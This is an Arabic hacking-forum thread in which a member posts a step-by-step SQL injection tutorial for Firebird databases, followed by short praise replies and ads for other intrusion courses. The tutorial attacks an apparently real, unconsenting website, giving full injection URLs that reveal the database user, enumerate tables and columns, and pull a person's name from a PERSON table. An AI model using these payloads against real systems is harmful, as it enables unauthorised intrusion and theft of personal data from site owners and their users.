1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

الموضوع في '[ SQL-injection ]' بواسطة Hiker, بتاريخ ‏7 يوليو 2014.

كاتب الموضوع : Hiker المشاهدات : 456 الردود : 8 ‏7 يوليو 2014
حالة الموضوع:
مغلق
  1. غير متصل

    Hiker <span style="font-weight: bold; text-shadow: #BBBB
    rank
    V • I • P

    عضو منذ:
    ‏2 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    بسم الله الرحمن الرحيم
    السلام عليكم ورحمة الله وبركاتة
    اليوم بإذن الله سنشرح حقن قواعد FireBird
    وإن شاء الله سأتطرق الى طريقة شرح مبسطة مع شرح للاستعلامات والاوامر بطريقة مبسطة وميسرة ان شاء الله وكيفية حقن مثل هذه القواعد

    اولاَ اقرأ عنها هنا ولو بشئ بسيط ولكن لكي تكون لديك معرفة ولو بسيطة عن هذا النوع من القواعد
    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    الآن نتوجة الى حقن قواعد FireBird
    في البدايه لنتعرف على ان الموقع مصاب مثل هذا النوع من القواعد
    طيب نشوف
    لاحظ هذا الموقع
    كود PHP:
    http://seafarer.od.ua/?page=study&course=47
    بالطريقة الاعتيادية وبوضع علامة سينكل كيويت ' في نهاية الرابط كما في الصورة الآتية
    [​IMG]
    طيب كما نلاحظ هنا ظهور خطأ
    من الخطأ الضاهر لدينا فوق تبين لنا ان هذا النوع هو فايربيرد
    ومن خلال دالة الاستعلام التي ضهرت في الخطأ التي هي ibase_query()
    وطبعا هناك عدة دوال نتعرف عليها ان نوع القاعدة فايربيرد من ضمنها
    طيب نكمل
    نريد ان نتعرف على اسم مستخدم القاعده
    عن طريق الامر التالي
    كود PHP:
    and 1=(user)
    فيصبح الرابط
    كود PHP:
    http://seafarer.od.ua/?page=study&course=47%20and%201=%28user%29--
    [​IMG]
    كما نلاحظ المستخدم هو SITE
    طيب
    الان نتوجه الى استخراج جداول القاعده التابعة للفايربيرد
    من خلال الاستعلام الآتي
    كود PHP:
    and 1=(select+first+1+skip+n+distinct+rdb$relation_name+from+rdb$relation_fields)--
    نفسر شوي الاستعلام الفوق
    كود PHP:
    first+1+skip+=  ها نقصد بها من بداية اول جدول بإستثناء او تخطي الجدول وحسب الترتيب تصاعديأ ام تنازلياَ
    distinct 
    امر استعلام يفيد ترتيب او فلترة الجداول او الاعمدة بداخل القاعدة من غير تكرار الطلب
    rdb$relation_name 
    وهنا مصطلح خاص بقاعدة الفايربيرد ويعني اسم الجدول لقاعدة الفايربيرد
    rdb$relation_fields 
    هنا ايضاَ مصطلح خاص بقواعد الفايربيرد ويعني من حقول نواة القاعده للفايربيرد

    يعني كأني اخاطب القاعدة واقول اختارلي من بدايه الحقول الي بداخل القاعده اول جدول مع تخطي الجدول حسب الترتيب وبدون تكرار عمليه الطلب من نواة قاعدة الفايربيرد .

    الآن تعرفنا على الاوامر ومعناها لكي نفهم ماذا نخاطب القاعدة
    نجرب نستخرج الجدول الاول للقاعدة الفايربير بإضافة ااستعلام على الموقع بهذا الشكل
    كود PHP:
    http://seafarer.od.ua/?page=study&course=47%20and%201=%28select+first+1+skip+1+distinct+rdb$relation_name+from+rdb$relation_fields%29--
    [​IMG]
    وكما نلاحظ في الصورة لدينا اول جدول وهو CERT
    الآن لتنقل من جدول الى آخر نقوم بتغيير الرقم 1 الى 2 وهكذا الى ان يتم الوصول الى الجدول المطلوب
    نلاحظ عسريع راح اختصر العمليه لجلب جدول اليوزر الذي يقع ترتيه 22
    لاحظ الرابط يصبح بالشكل التالي
    كود PHP:
    http://seafarer.od.ua/?page=study&course=47%20and%201=%28select+first+1+skip+22+distinct+rdb$relation_name+from+rdb$relation_fields%29--
      
    [​IMG]
    كما نلاحظ جدول اليوزر هو PERSON

    الان تعرفنا على كيفية استخراج الجداول من قاعد الفايربيرد

    ننتقل الى استخراج الاعمدة التي بداخل جدول اليوزر
    عن طريق الاستعلام التالي لاحظ
    كود PHP:
    and 1=(select+first+1+skip+1+distinct+rdb$field_name+from+rdb$relation_fields+where+rdb$relation_name=(query tables))--
      
    لو تلاحظ هنا الاستعلام مشابة للاستعلام الي فوق تبع استعلام الجداول
    لكن الاختلاف البسيط هو
    كود PHP:
    rdb$field_name اسم العمود 
    (query tables)= هنا نضع استعلام الخاص بجداول كامل 
    يعني بالمختصر كأني اقول استعلملي اسم العمود الاول من الجدول الاول

    لاحظ كيف تصبح الحقنة
    كود PHP:
    and  1=(select+first+1+skip+1+distinct+rdb$field_name+from+rdb$relation_fields+where+rdb$relation_name=(select+first+1+skip+1+distinct+rdb$relation_name+from+rdb$relation_fields)--
    فيصبح الرابط
    كود PHP:
    http://seafarer.od.ua/?page=study&course=47%20and%201=%28select+first+1+skip+1+distinct+rdb$field_name+from+rdb$relation_fields+where+rdb$relation_name=%28select+first+1+skip+1+distinct+rdb$relation_name+from+rdb$relation_fields%29%29--
      
    [​IMG]
    هنا استخرجنا العمود الاول الي هو DCARD
    من الجدول الاول الي هو CERT

    طيب الآن لو اردنا استخراج اعمدة الجدول PERSON
    الي افترضنا جدول اليوزر الامر سهل كل الي عليك اتشوف ترتيب الجدول كان في اي حقل من القاعده لو تذكرون كان 22 اذا نستبدل الرقه واحد بـــ 22
    ركز التغيير يكون لجهة استعلام الجداول وليس الاعمدة لاحظ الحقنه وانت تفهم
    كود PHP:
    http://seafarer.od.ua/?page=study&course=47%20and%201=%28select+first+1+skip+1+distinct+rdb$field_name+from+rdb$relation_fields+where+rdb$relation_name=%28select+first+1+skip+22+distinct+rdb$relation_name+from+rdb$relation_fields%29%29--
    [​IMG]
    كما نلاحظ استخرجنا اول عمود الي هوه BIRTH
    من جدول PERSON

    طيب الآن نستخرج الاعمدة البقية بنفس الطريقة ولكن هالمره التغير راح يكون من جهة استعلام الاعمدة لاحظ الحقنة على الموقع
    كود PHP:
    http://seafarer.od.ua/?page=study&course=47%20and%201=%28select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields+where+rdb$relation_name=%28select+first+1+skip+22+distinct+rdb$relation_name+from+rdb$relation_fields%29%29--
    [​IMG]
    كما نلاحظ ثاني عمود الي هوه CITY

    طيب نكمل على السريع انا استخرج عمود اليوزر نلاحظ كيف راح نجلب بيانات الاعمدة
    من خلال الاستعلام الآتي
    كود PHP:
    and 1=(select+first+1+rdb$col1 || rdb$col2 +from+rdb$relation_name)
      
    الأستعلام واضح كما ترى

    طيب راح يكون الشكل النهائي لاسخراج البيانات بهذا الشكل لاحظ
    كود PHP:
    http://seafarer.od.ua/?page=study&course=47%20and%201=%28select+first+1+NAME+from+PERSON%29--
    [​IMG]
    كما نلاحظ تم استخراج بيانات الاعمده الي هيه
    GENNADIY

    الى هنا توصلنا الى نهاية الموضوع
    اي استفسار عن الموضوع انا حاضر
    في امان الله



     


    جاري تحميل الصفحة...
  2. غير متصل

    CoMmAnDo AlMaSaBi
    DeveloPer Plus

    عضو منذ:
    ‏13 مايو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

    وعليكم السلام ورحمة الله وبركاته

    بوركت جهودك اخي العزيز

    جزاك الله عنا خير جزاء المحسنين
     


  3. غير متصل

    M3N X
    Developer

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    9
    نقاط الجائزة:

    رد: حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

    تسلم يمينك والله يعطيك الف عافية !:"
     


  4. غير متصل

    Hamada Bader
    rankrank
    Active DeveloPer

    عضو منذ:
    ‏13 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

    بارك الله فيك يغالي

    دروسك شيقة يابطل

    متابعين معك :{8}:
     


  5. غير متصل

    D3VIL H4CK3R
    Developer

    عضو منذ:
    ‏4 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:

    رد: حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

    وعليكم السلام ورحمة الله

    مآ شآء الله عليك يآ مبدع واصل تفوقك :{1}:
     


  6. غير متصل

    Resident Evil
    rank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

    كالعاده مبدع بدون منافس :lolًٌُ:ٌ
     


  7. غير متصل

    •● ṔriNḉẻ ●•
    DeveloPer Plus

    عضو منذ:
    ‏5 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

    وعليكم السلام ورحمة الله و بركاته

    بارك الله فيك أخي شرح رائع

    واصل ابداعك ولا تحرمنا من جديدك يالغالي
     


  8. غير متصل

    Mr.raddadi <font color="#009900">[ </font> <font color="#6600
    rankrank
    ExpErt DeveloPer

    عضو منذ:
    ‏4 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

    مشكور ياوحش لاتحرمنا من جديدك
     


  9. غير متصل

    n0.H4ck
    DeveloPer Plus

    عضو منذ:
    ‏7 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: حقن قواعد البيانات الــSQL INJECTION DB-FireBird+ FireBird+

    مشكوور على المجهود ً#ٌ5oًًًُ.
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...